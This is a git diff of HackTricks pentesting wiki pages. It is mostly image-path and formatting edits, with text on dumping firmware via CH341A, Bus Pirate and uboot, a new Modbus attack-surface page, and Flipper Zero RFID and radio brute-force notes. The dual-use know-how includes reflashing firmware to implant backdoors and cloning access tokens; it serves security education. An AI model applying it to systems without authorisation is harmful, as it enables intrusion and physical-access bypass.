-Getting Serial Console can be helpful, but often times it happens that the files are read-only. This constrains the analysis due to various reasons. For example, a tools that are required to send and recieve packages would not be there in the firmware. So extracting the binaries to reverse engineer them is not feasible. Hence, having the whole firmware dumped on the system and extracting the binaries for analysis can be very helpful. 
+Getting Serial Console can be helpful, but often times it happens that the files are read-only. This constrains the analysis due to various reasons. For example, a tools that are required to send and recieve packages would not be there in the firmware. So extracting the binaries to reverse engineer them is not feasible. Hence, having the whole firmware dumped on the system and extracting the binaries for analysis can be very helpful.
 
-Also, during red reaming and getting physical access to devices, dumping the firmware can help on modifying the files or injecting malicious files and then reflashing them into the memory which could be helpful to implant a backdoor into the device. Hence, there are numerous possibilities that can be unlocked with firmware dumping. 
+Also, during red reaming and getting physical access to devices, dumping the firmware can help on modifying the files or injecting malicious files and then reflashing them into the memory which could be helpful to implant a backdoor into the device. Hence, there are numerous possibilities that can be unlocked with firmware dumping.
 
 ### CH341A EEPROM Programmer and Reader
 
-This device is an inexpensive tool for dumping firmwares from EEPROMs and also reflashing them with firmware files. This has been a popular choice for working with computer BIOS chips (which are just EEPROMs). This device connects over USB and needs minimal tools to get started. Also, it usually gets the task done quickly, so can be helpful in physical device access too. 
+This device is an inexpensive tool for dumping firmwares from EEPROMs and also reflashing them with firmware files. This has been a popular choice for working with computer BIOS chips (which are just EEPROMs). This device connects over USB and needs minimal tools to get started. Also, it usually gets the task done quickly, so can be helpful in physical device access too.
 
-<img src="../../.gitbook/assets/board_image_ch341a.jpg" alt="drawing" width="400" align="center"/>
+![drawing](../../.gitbook/assets/board\_image\_ch341a.jpg)
 
 Connect the EEPROM memory with the CH341a Programmer and plug the device into the computer. Incase the device is not getting detected, try installing drivers into the computer. Also, make sure that the EEPROM is connected in proper orientation (usually, place the VCC Pin in reverse orientation to the USB connector) or else, the software would not be able to detect the chip. Refer to the diagram if required:
 
-<img src="../../.gitbook/assets/connect_wires_ch341a.jpg" alt="drawing" width="350"/>
+![drawing](../../.gitbook/assets/connect\_wires\_ch341a.jpg) ![drawing](../../.gitbook/assets/eeprom\_plugged\_ch341a.jpg)
 
-<img src="../../.gitbook/assets/eeprom_plugged_ch341a.jpg" alt="drawing" width="350"/>
+Finally, use softwares like flashrom, G-Flash (GUI), etc. for dumping the firmware. G-Flash is a minimal GUI tool is fast and detects the EEPROM automatically. This can be helpful in the firmware needs to be extracted quickly, without much tinkering with the documentation.
 
-Finally, use softwares like flashrom, G-Flash (GUI), etc. for dumping the firmware. G-Flash is a minimal GUI tool is fast and detects the EEPROM automatically. This can be helpful in the firmware needs to be extracted quickly, without much tinkering with the documentation. 
+![drawing](../../.gitbook/assets/connected\_status\_ch341a.jpg)
 
-<img src="../../.gitbook/assets/connected_status_ch341a.jpg" alt="drawing" width="350"/>
+After dumping the firmware, the analysis can be done on the binary files. Tools like strings, hexdump, xxd, binwalk, etc. can be used to extract a lot of information about the firmware as well as the whole file system too.
 
-After dumping the firmware, the analysis can be done on the binary files. Tools like strings, hexdump, xxd, binwalk, etc. can be used to extract a lot of information about the firmware as well as the whole file system too. 
-
-To extract the contents from the firmware, binwalk can be used. Binwalk analyses for hex signatures and identifies the files in the binary file and is capabale of extracting them. 
+To extract the contents from the firmware, binwalk can be used. Binwalk analyses for hex signatures and identifies the files in the binary file and is capabale of extracting them.
 
 ```
 binwalk -e <filename>  
 ```
 
-The <filename> can be .bin or .rom as per the tools and configurations used. 
+The can be .bin or .rom as per the tools and configurations used.
 
-{% hint style="danger" %} Note that firmware extraction is a delicate process and requires a lot of patience. Any mishandling can potentially corrupt the firmware or even erase it completely and make the device unusable. It is recommended to study the specific device before attempting to extract the firmware. {% endhint %}
+{% hint style="danger" %}
+Note that firmware extraction is a delicate process and requires a lot of patience. Any mishandling can potentially corrupt the firmware or even erase it completely and make the device unusable. It is recommended to study the specific device before attempting to extract the firmware.
+{% endhint %}
 
 ### Bus Pirate + flashrom
 
-![](<../../.gitbook/assets/image (907).png>)
+![](<../../.gitbook/assets/image (910).png>)
 
 Note that even if the PINOUT of the Pirate Bus indicates pins for **MOSI** and **MISO** to connect to SPI however some SPIs may indicate pins as DI and DO. **MOSI -> DI, MISO -> DO**
 
-![](<../../.gitbook/assets/image (357).png>)
+![](<../../.gitbook/assets/image (360).png>)
 
 In Windows or Linux you can use the program [**`flashrom`**](https://www.flashrom.org/Flashrom) to dump the content of the flash memory running something like:
 
diff --git a/todo/hardware-hacking/uart.md b/todo/hardware-hacking/uart.md
index 1cd4f95a6..6c8ec730b 100644
--- a/todo/hardware-hacking/uart.md
+++ b/todo/hardware-hacking/uart.md
@@ -16,7 +16,7 @@ Other ways to support HackTricks:
 
 ### [WhiteIntel](https://whiteintel.io)
 
-<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (1227).png" alt=""><figcaption></figcaption></figure>
 
 [**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
 
@@ -26,7 +26,7 @@ You can check their website and try their engine for **free** at:
 
 {% embed url="https://whiteintel.io" %}
 
----
+***
 
 ## Basic Information
 
@@ -36,7 +36,7 @@ Generally, the line is held high (at a logical 1 value) while UART is in the idl
 
 We call the most common configuration 8N1: eight data bits, no parity, and one stop bit. For example, if we wanted to send the character C, or 0x43 in ASCII, in an 8N1 UART configuration, we would send the following bits: 0 (the start bit); 0, 1, 0, 0, 0, 0, 1, 1 (the value of 0x43 in binary), and 0 (the stop bit).
 
-![](<../../.gitbook/assets/image (761).png>)
+![](<../../.gitbook/assets/image (764).png>)
 
 Hardware tools to communicate with UART:
 
@@ -97,11 +97,11 @@ After configuration, use the command `minicom` to start get the UART Console.
 
 ## UART Via Arduino UNO R3 (Removable Atmel 328p Chip Boards)
 
-Incase UART Serial to USB adapters are not available, Arduino UNO R3 can be used with a quick hack. Since Arduino UNO R3 is usually available anywhere, this can save a lot of time. 
+Incase UART Serial to USB adapters are not available, Arduino UNO R3 can be used with a quick hack. Since Arduino UNO R3 is usually available anywhere, this can save a lot of time.
 
-Arduino UNO R3 has a USB to Serial adapter built on the board itself. To get UART connection, just plug out the Atmel 328p microcontroller chip from the board. This hack works on Arduino UNO R3 variants having the Atmel 328p not soldered on the board (SMD version is used in it). Connect the RX pin of Arduino (Digital Pin 0) to the TX pin of the UART Interface and TX pin of the Arduino (Digital Pin 1) to the RX pin of the UART interface. 
+Arduino UNO R3 has a USB to Serial adapter built on the board itself. To get UART connection, just plug out the Atmel 328p microcontroller chip from the board. This hack works on Arduino UNO R3 variants having the Atmel 328p not soldered on the board (SMD version is used in it). Connect the RX pin of Arduino (Digital Pin 0) to the TX pin of the UART Interface and TX pin of the Arduino (Digital Pin 1) to the RX pin of the UART interface.
 
-Finally, it is recommended to use Arduino IDE to get the Serial Console. In the `tools` section in the menu, select `Serial Console` option and set the baud rate as per the UART interface. 
+Finally, it is recommended to use Arduino IDE to get the Serial Console. In the `tools` section in the menu, select `Serial Console` option and set the baud rate as per the UART interface.
 
 ## Bus Pirate
 
@@ -181,34 +181,37 @@ waiting a few secs to repeat....
 
 ## Dumping Firmware with UART Console
 
-UART Console provides a great way to work with the underlying firmware in runtime environment. But when the UART Console access is read-only, it might introduce a lot of constrains. In many embedded devices, the firmware is stored in EEPROMs and executed in processors that have volatile memory. Hence, the firmware is kept read-only since the original firmware during manufacturing is inside the EEPROM itself and any new files would get lost due to volatile memory. Hence, dumping firmware is a valuable effort while working with embedded firmwares. 
+UART Console provides a great way to work with the underlying firmware in runtime environment. But when the UART Console access is read-only, it might introduce a lot of constrains. In many embedded devices, the firmware is stored in EEPROMs and executed in processors that have volatile memory. Hence, the firmware is kept read-only since the original firmware during manufacturing is inside the EEPROM itself and any new files would get lost due to volatile memory. Hence, dumping firmware is a valuable effort while working with embedded firmwares.
 
 There are a lot of ways to do this and the SPI section covers methods to extract firmware directly from the EEPROM with various devices. Although, it is recommended to first try dumping firmware with UART since dumping firmware with physical devices and external interactions can be risky.
 
-Dumping firmware from UART Console requires first getting access to bootloaders. Many popular vendors make use of <b>uboot</b> (Universal Bootloader) as their bootloader to load Linux. Hence, getting access to <b>uboot</b> is necessary. 
+Dumping firmware from UART Console requires first getting access to bootloaders. Many popular vendors make use of uboot (Universal Bootloader) as their bootloader to load Linux. Hence, getting access to uboot is necessary.
 
-To get access to <b>boot</b> bootloader, connect the UART port to the computer and use any of the Serial Console tools and keep the power supply to the device disconnected. Once the setup is ready, press the Enter Key and hold it. Finally, connect the power supply to the device and let it boot. 
+To get access to boot bootloader, connect the UART port to the computer and use any of the Serial Console tools and keep the power supply to the device disconnected. Once the setup is ready, press the Enter Key and hold it. Finally, connect the power supply to the device and let it boot.
 
-Doing this will interrupt <b>uboot</b> from loading and will provide a menu. It is recommended to understand <b>uboot</b> commands and using help menu to list them. This might be `help` command. Since different vendors use different configurations, it is necessary to understand each of them seperately. 
+Doing this will interrupt uboot from loading and will provide a menu. It is recommended to understand uboot commands and using help menu to list them. This might be `help` command. Since different vendors use different configurations, it is necessary to understand each of them seperately.
+
+Usually, the command to dump the firmware is:
 
-Usually, the command to dump the firmware is: 
 ```
 md
 ```
-which stands for "memory dump". This will dump the memory (EEPROM Content) on the screen. It is recommended to log the Serial Console output before starting the proceedure to capture the memory dump. 
+
+which stands for "memory dump". This will dump the memory (EEPROM Content) on the screen. It is recommended to log the Serial Console output before starting the proceedure to capture the memory dump.
 
 Finally, just strip out all the unnecessary data from the log file and store the file as `filename.rom` and use binwalk to extract the contents:
+
 ```
 binwalk -e <filename.rom>
 ```
-This will list the possible contents from the EEPROM as per the signatures found in the hex file. 
 
-Although, it is necessary to note that it's not always the case that the <b>uboot</b> is unlocked even if it is being used. If the Enter Key doesn't do anything, check for different keys like Space Key, etc. If the bootloader is locked and does not get interrupted, this method would not work. To check if <b>uboot</b> is the bootloader for the device, check the output on the UART Console while booting of the device. It might mention <b>uboot</b> while booting. 
+This will list the possible contents from the EEPROM as per the signatures found in the hex file.
 
+Although, it is necessary to note that it's not always the case that the uboot is unlocked even if it is being used. If the Enter Key doesn't do anything, check for different keys like Space Key, etc. If the bootloader is locked and does not get interrupted, this method would not work. To check if uboot is the bootloader for the device, check the output on the UART Console while booting of the device. It might mention uboot while booting.
 
 ### [WhiteIntel](https://whiteintel.io)
 
-<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (1227).png" alt=""><figcaption></figcaption></figure>
 
 [**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
 
@@ -218,7 +221,6 @@ You can check their website and try their engine for **free** at:
 
 {% embed url="https://whiteintel.io" %}
 
-
 <details>
 
 <summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
diff --git a/todo/industrial-control-systems-hacking/modbus.md b/todo/industrial-control-systems-hacking/modbus.md
new file mode 100644
index 000000000..7ca3e062d
--- /dev/null
+++ b/todo/industrial-control-systems-hacking/modbus.md
@@ -0,0 +1,33 @@
+# The Modbus Protocol 
+
+## Introduction to Modbus Protocol 
+
+The Modbus protocol is a widely used protocol in Industrial Automation and Control Systems. Modbus allows communication between various devices such as programmable logic controllers (PLCs), sensors, actuators, and other industrial devices. Understanding the Modbus Protocol is essential since this is the single most used communication protocol in the ICS and has a lot of potential attack surface for sniffing and even injecting commands into PLCs.
+
+Here, concepts are stated point-wise providing context of the protcol and it's nature of operation. The biggest challenge in ICS system security is the cost of implementation and upgradation. These protocols and standards where designed in the early 80s and 90s which are still widely used. Since an industry has a lot of devices and connections, upgrading devices is very difficult, which provides hackers with an edge of dealing with outdated protocols. Attacks on Modbus is like practically unevitable since it is going to be used without upgradation is it's operation is critical to the industry. 
+
+## The Client-Server Architecture
+
+Modbus Protocol is typically used as in Client Server Architecture where a master device (client) initiates communication with one or more slave devices (servers). This is also referred to as Master-Slave architecture, which is widely used in electronics and IoT with SPI, I2C, etc. 
+
+## Serial and Etherent Versions
+
+Modbus Protocol is designed for both, Serial Communication as well as Ethernet Communications. The Serial Communication is widely used in legacy systems while modern devices support Ethernet which offers high data rates and is more suitable for modern industrial networks. 
+
+## Data Representation 
+
+Data is transmitted in Modbus protocol as ASCII or Binary, although the binary format is used due to it's compactibility with older devices. 
+
+## Function Codes 
+
+ ModBus Protocol works with transmission of specific function codes that are used to operate the PLCs and various control devices. This portion is important to undertstand since replay attacks can be done by retransmitting function codes. Legacy devices do not support any encryption towards data transmission and usually have long wires which connect them, which results to tampering of these wires and capturing/injected data. 
+
+ ## Addressing of Modbus 
+
+Each device in the network has some unique address which is essential for communication between devices. Protocols like Modbus RTU, Modbus TCP, etc. are used to implement addressing and serves like a transport layer to the data transmission. The data that is transferred is in the Modbus protocol format that contains the message.
+
+Furthermore, Modbus also implements error checks to ensure the integrity of the transmitted data. But most of al, Modbus is a Open Standard and anyone can implement it in their devices. This made this protocol to go on global standard and it's widespread in the industrial automation industry. 
+
+Due to it's large scale use and lack of upgradations, attacking Modbus provides a significant advantage with it's attack surface. ICS is highly dependent on communication between devices and any attacks made on them can be dangerous for the operation of the industrial systems. Attacks like replay, data injection, data sniffing and leaking, Denial of Service, data forgery, etc. can be carried out if the medium of transmission is identified by the attacker. 
+
+
diff --git a/todo/more-tools.md b/todo/more-tools.md
index c9251cbee..b10049a91 100644
--- a/todo/more-tools.md
+++ b/todo/more-tools.md
@@ -14,7 +14,7 @@ Other ways to support HackTricks:
 
 </details>
 
-<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
+<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
 
 {% embed url="https://websec.nl/" %}
 
@@ -135,7 +135,7 @@ Firmware emulation: FIRMADYNE (https://github.com/firmadyne/firmadyne/) is a pla
 * [https://github.com/serain/bbrecon](https://github.com/serain/bbrecon) : Info about BB programs
 
 
-<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
+<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
 
 {% embed url="https://websec.nl/" %}
 
diff --git a/todo/radio-hacking/flipper-zero/fz-125khz-rfid.md b/todo/radio-hacking/flipper-zero/fz-125khz-rfid.md
index ea6164b4f..27d133c0d 100644
--- a/todo/radio-hacking/flipper-zero/fz-125khz-rfid.md
+++ b/todo/radio-hacking/flipper-zero/fz-125khz-rfid.md
@@ -14,11 +14,10 @@ Other ways to support HackTricks:
 
 </details>
 
-<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
+<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
 
 {% embed url="https://websec.nl/" %}
 
-
 ## Intro
 
 For more info about how 125kHz tags work check:
@@ -52,13 +51,13 @@ Some times, when you get a card you will find the ID (or part) of it written in
 For example in this EM-Marin card in the physical card is possible to **read the last 3 of 5 bytes in clear**.\
 The other 2 can be brute-forced if you cannot read them from the card.
 
-<figure><img src="../../../.gitbook/assets/image (101).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../../.gitbook/assets/image (104).png" alt=""><figcaption></figcaption></figure>
 
 * **HID**
 
 Same happens in this HID card where only 2 out of 3 bytes can be found printed in the card
 
-<figure><img src="../../../.gitbook/assets/image (1011).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../../.gitbook/assets/image (1014).png" alt=""><figcaption></figcaption></figure>
 
 ### Emulate/Write
 
@@ -68,11 +67,10 @@ After **copying** a card or **entering** the ID **manually** it's possible to **
 
 * [https://blog.flipperzero.one/rfid/](https://blog.flipperzero.one/rfid/)
 
-<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
+<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
 
 {% embed url="https://websec.nl/" %}
 
-
 <details>
 
 <summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
diff --git a/todo/radio-hacking/flipper-zero/fz-ibutton.md b/todo/radio-hacking/flipper-zero/fz-ibutton.md
index c7aad2962..7dbd03a2e 100644
--- a/todo/radio-hacking/flipper-zero/fz-ibutton.md
+++ b/todo/radio-hacking/flipper-zero/fz-ibutton.md
@@ -26,7 +26,7 @@ For more info about what is an iButton check:
 
 The **blue** part of the following imageis how you would need to **put the real iButton** so the Flipper can **read it.** The **green** part is how you need to **touch the reader** with the Flipper zero to **correctly emulate an iButton**.
 
-<figure><img src="../../../.gitbook/assets/image (562).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../../.gitbook/assets/image (565).png" alt=""><figcaption></figcaption></figure>
 
 ## Actions
 
@@ -46,7 +46,7 @@ It's possible to **emulate** saved iButtons (read or manually added).
 If you cannot make the expected contacts of the Flipper Zero touch the reader you can **use the external GPIO:**
 {% endhint %}
 
-<figure><img src="../../../.gitbook/assets/image (135).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../../.gitbook/assets/image (138).png" alt=""><figcaption></figcaption></figure>
 
 ## References
 
diff --git a/todo/radio-hacking/flipper-zero/fz-infrared.md b/todo/radio-hacking/flipper-zero/fz-infrared.md
index 05cd884e1..f21f9a814 100644
--- a/todo/radio-hacking/flipper-zero/fz-infrared.md
+++ b/todo/radio-hacking/flipper-zero/fz-infrared.md
@@ -32,7 +32,7 @@ As the **decoding of the infrared** signal happens on the **software** side, Fli
 
 ### Universal Remotes
 
-Flipper Zero can be used as a **universal remote to control any TV, air conditioner, or media center**. In this mode, Flipper **bruteforces** all **known codes** of all supported manufacturers **according to the dictionary from the SD card**. You don't need to choose a particular remote to turn of a restaurant TV.
+Flipper Zero can be used as a **universal remote to control any TV, air conditioner, or media center**. In this mode, Flipper **bruteforces** all **known codes** of all supported manufacturers **according to the dictionary from the SD card**. You don't need to choose a particular remote to turn off a restaurant TV.
 
 It is enough to press the power button in the Universal Remote mode, and Flipper will **sequentially send "Power Off"** commands of all the TVs it knows: Sony, Samsung, Panasonic... and so on. When the TV receives its signal, it will react and turn off.
 
diff --git a/todo/radio-hacking/flipper-zero/fz-nfc.md b/todo/radio-hacking/flipper-zero/fz-nfc.md
index ad903832d..feba77a99 100644
--- a/todo/radio-hacking/flipper-zero/fz-nfc.md
+++ b/todo/radio-hacking/flipper-zero/fz-nfc.md
@@ -67,7 +67,7 @@ Flipper Zero can **read NFC cards**, however, it **doesn't understand all the pr
 
 #### Reading the UID VS Reading the Data Inside <a href="#reading-the-uid-vs-reading-the-data-inside" id="reading-the-uid-vs-reading-the-data-inside"></a>
 
-<figure><img src="../../../.gitbook/assets/image (214).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../../.gitbook/assets/image (217).png" alt=""><figcaption></figcaption></figure>
 
 In Flipper, reading 13.56 MHz tags can be divided into two parts:
 
diff --git a/todo/radio-hacking/flipper-zero/fz-sub-ghz.md b/todo/radio-hacking/flipper-zero/fz-sub-ghz.md
index 450b9c211..2301e5d62 100644
--- a/todo/radio-hacking/flipper-zero/fz-sub-ghz.md
+++ b/todo/radio-hacking/flipper-zero/fz-sub-ghz.md
@@ -26,13 +26,13 @@ Other ways to support HackTricks:
 
 Flipper Zero can **receive and transmit radio frequencies in the range of 300-928 MHz** with its built-in module, which can read, save, and emulate remote controls. These controls are used for interaction with gates, barriers, radio locks, remote control switches, wireless doorbells, smart lights, and more. Flipper Zero can help you to learn if your security is compromised.
 
-<figure><img src="../../../.gitbook/assets/image (711).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../../.gitbook/assets/image (714).png" alt=""><figcaption></figcaption></figure>
 
 ## Sub-GHz hardware <a href="#kfpn7" id="kfpn7"></a>
 
 Flipper Zero has a built-in sub-1 GHz module based on a [](https://www.st.com/en/nfc/st25r3916.html#overview)[CC1101 chip](https://www.ti.com/lit/ds/symlink/cc1101.pdf) and a radio antenna (the maximum range is 50 meters). Both the CC1101 chip and the antenna are designed to operate at frequencies in the 300-348 MHz, 387-464 MHz, and 779-928 MHz bands.
 
-<figure><img src="../../../.gitbook/assets/image (920).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../../.gitbook/assets/image (923).png" alt=""><figcaption></figcaption></figure>
 
 ## Actions
 
@@ -62,7 +62,7 @@ The **Read** option **listens on the configured frequency** on the indicated mod
 While Read is in use, it's possible to press the **left button** and **configure it**.\
 At this moment it has **4 modulations** (AM270, AM650, FM328 and FM476), and **several relevant frequencies** stored:
 
-<figure><img src="../../../.gitbook/assets/image (944).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../../.gitbook/assets/image (947).png" alt=""><figcaption></figcaption></figure>
 
 You can set **any that interests you**, however, if you are **not sure which frequency** could be the one used by the remote you have, **set Hopping to ON** (Off by default), and press the button several times until Flipper captures it and give you the info you need to set the frequency.
 
diff --git a/todo/radio-hacking/ibutton.md b/todo/radio-hacking/ibutton.md
index 724c3a8d6..09ec3bfa8 100644
--- a/todo/radio-hacking/ibutton.md
+++ b/todo/radio-hacking/ibutton.md
@@ -18,17 +18,17 @@ Other ways to support HackTricks:
 
 iButton is a generic name for an electronic identification key packed in a **coin-shaped metal container**. It is also called **Dallas Touch** Memory or contact memory. Even though it is often wrongly referred to as a “magnetic” key, there is **nothing magnetic** in it. In fact, a full-fledged **microchip** operating on a digital protocol is hidden inside.
 
-<figure><img src="../../.gitbook/assets/image (912).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (915).png" alt=""><figcaption></figcaption></figure>
 
 ### What is iButton? <a href="#what-is-ibutton" id="what-is-ibutton"></a>
 
 Usually, iButton implies the physical form of the key and reader - a round coin with two contacts. For the frame surrounding it, there are lots of variations from the most common plastic holder with a hole to rings, pendants, etc.
 
-<figure><img src="../../.gitbook/assets/image (1075).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (1078).png" alt=""><figcaption></figcaption></figure>
 
 When the key reaches the reader, the **contacts come to touch** and the key is powered to **transmit** its ID. Sometimes the key is **not read** immediately because the **contact PSD of an intercom is larger** than it should be. So the outer contours of the key and the reader couldn't touch. If that's the case, you'll have to press the key over one of the walls of the reader.
 
-<figure><img src="../../.gitbook/assets/image (287).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (290).png" alt=""><figcaption></figcaption></figure>
 
 ### **1-Wire protocol** <a href="#id-1-wire-protocol" id="id-1-wire-protocol"></a>
 
diff --git a/todo/radio-hacking/infrared.md b/todo/radio-hacking/infrared.md
index 540a60d68..00d9ce68b 100644
--- a/todo/radio-hacking/infrared.md
+++ b/todo/radio-hacking/infrared.md
@@ -34,19 +34,19 @@ IR protocols differ in 3 factors:
 
 Bits are encoded by modulating the duration of the space between pulses. The width of the pulse itself is constant.
 
-<figure><img src="../../.gitbook/assets/image (292).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (295).png" alt=""><figcaption></figcaption></figure>
 
 **2. Pulse Width Encoding**
 
 Bits are encoded by modulation of the pulse width. The width of space after pulse burst is constant.
 
-<figure><img src="../../.gitbook/assets/image (279).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (282).png" alt=""><figcaption></figcaption></figure>
 
 **3. Phase Encoding**
 
 It is also known as Manchester encoding. The logical value is defined by the polarity of the transition between pulse burst and space. "Space to pulse burst" denotes logic "0", "pulse burst to space" denotes logic "1".
 
-<figure><img src="../../.gitbook/assets/image (631).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (634).png" alt=""><figcaption></figcaption></figure>
 
 **4. Combination of previous ones and other exotics**
 
@@ -60,7 +60,7 @@ Manufacturers love to use their own unique IR protocols, even within the same ra
 
 The most reliable way to see how the remote IR signal looks like is to use an oscilloscope. It does not demodulate or invert the received signal, it is just displayed "as is". This is useful for testing and debugging. I will show the expected signal on the example of the NEC IR protocol.
 
-<figure><img src="../../.gitbook/assets/image (232).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (235).png" alt=""><figcaption></figcaption></figure>
 
 Usually, there is a preamble at the beginning of an encoded packet. This allows the receiver to determine the level of gain and background. There are also protocols without preamble, for example, Sharp.
 
diff --git a/todo/radio-hacking/pentesting-ble-bluetooth-low-energy.md b/todo/radio-hacking/pentesting-ble-bluetooth-low-energy.md
index 5fe4b710f..314fb9619 100644
--- a/todo/radio-hacking/pentesting-ble-bluetooth-low-energy.md
+++ b/todo/radio-hacking/pentesting-ble-bluetooth-low-energy.md
@@ -22,7 +22,7 @@ BLE devices communicate is by sending **advertising packets** (**beacons**), the
 
 The listening device, also called a central device, can respond to an advertising packet with a **SCAN request** sent specifically to the advertising device. The **response** to that scan uses the same structure as the **advertising** packet with additional information that couldn’t fit on the initial advertising request, such as the full device name.
 
-![](<../../.gitbook/assets/image (149).png>)
+![](<../../.gitbook/assets/image (152).png>)
 
 The preamble byte synchronizes the frequency, whereas the four-byte access address is a **connection identifier**, which is used in scenarios where multiple devices are trying to establish connections on the same channels. Next, the Protocol Data Unit (**PDU**) contains the **advertising data**. There are several types of PDU; the most commonly used are ADV\_NONCONN\_IND and ADV\_IND. Devices use the **ADV\_NONCONN\_IND** PDU type if they **don’t accept connections**, transmitting data only in the advertising packet. Devices use **ADV\_IND** if they **allow connections** and **stop sending advertising** packets once a **connection** has been **established**.
 
diff --git a/todo/radio-hacking/pentesting-rfid.md b/todo/radio-hacking/pentesting-rfid.md
index 4a714fc76..98438f767 100644
--- a/todo/radio-hacking/pentesting-rfid.md
+++ b/todo/radio-hacking/pentesting-rfid.md
@@ -39,7 +39,7 @@ Most RFID **security controls** have mechanisms that **restrict** the **read** o
 
 ### Low & High frequency tags comparison
 
-<figure><img src="../../.gitbook/assets/image (980).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (983).png" alt=""><figcaption></figcaption></figure>
 
 ## Low-Frequency RFID Tags (125kHz)
 
@@ -74,7 +74,7 @@ It's usually found in bank cards, public transport, and other secure passes.
 
 **High-frequency 13.56 MHz tags are a set of standards and protocols**. They are usually referred to as [NFC](https://nfc-forum.org/what-is-nfc/about-the-technology/), but that's not always correct. The basic protocol set used on the physical and logical levels is ISO 14443. High-level protocols, as well as alternative standards (like ISO 19092), are based upon it. Many people refer to this technology as **Near Field Communication (NFC)**, a term for devices operating over the 13.56 MHz frequency.
 
-<figure><img src="../../.gitbook/assets/image (927).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (930).png" alt=""><figcaption></figcaption></figure>
 
 To put it simply, NFC's architecture works like this: the transmission protocol is chosen by the company making the cards and implemented based on the low-level ISO 14443. For example, NXP invented its own high-level transmission protocol called Mifare. But on the lower level, Mifare cards are based on ISO 14443-A standard.
 
diff --git a/todo/radio-hacking/sub-ghz-rf.md b/todo/radio-hacking/sub-ghz-rf.md
index ccd47544f..b4ed80d14 100644
--- a/todo/radio-hacking/sub-ghz-rf.md
+++ b/todo/radio-hacking/sub-ghz-rf.md
@@ -25,17 +25,17 @@ In Europe 433.92MHz is commonly used and in U.S. and Japan it's the 315MHz.
 
 ## **Brute-force Attack**
 
-<figure><img src="../../.gitbook/assets/image (1081).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (1084).png" alt=""><figcaption></figcaption></figure>
 
 If instead of sending each code 5 times (sent like this to make sure the receiver gets it) so just send it once, the time is reduced to 6mins:
 
-<figure><img src="../../.gitbook/assets/image (616).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (622).png" alt=""><figcaption></figcaption></figure>
 
 and if you **remove the 2 ms waiting** period between signals you can **reduce the time to 3minutes.**
 
 Moreover, by using the De Bruijn Sequence (a way to reduce the number of bits needed to send all the potential binary numbers to burteforce) this **time is reduced just to 8 seconds**:
 
-<figure><img src="../../.gitbook/assets/image (580).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (583).png" alt=""><figcaption></figcaption></figure>
 
 Example of this attack was implemented in [https://github.com/samyk/opensesame](https://github.com/samyk/opensesame)
 
diff --git a/windows-hardening/active-directory-methodology/abusing-ad-mssql.md b/windows-hardening/active-directory-methodology/abusing-ad-mssql.md
index d0f8271a1..5e73f080d 100644
--- a/windows-hardening/active-directory-methodology/abusing-ad-mssql.md
+++ b/windows-hardening/active-directory-methodology/abusing-ad-mssql.md
@@ -12,11 +12,10 @@
 
 </details>
 
-<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
+<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
 
 {% embed url="https://websec.nl/" %}
 
-
 ## **MSSQL Enumeration / Discovery**
 
 The powershell module [PowerUpSQL](https://github.com/NetSPI/PowerUpSQL) is very useful in this case.
@@ -155,7 +154,7 @@ From **Windows** you could also find the links and execute commands manually usi
 
 _Login using Windows authentication:_
 
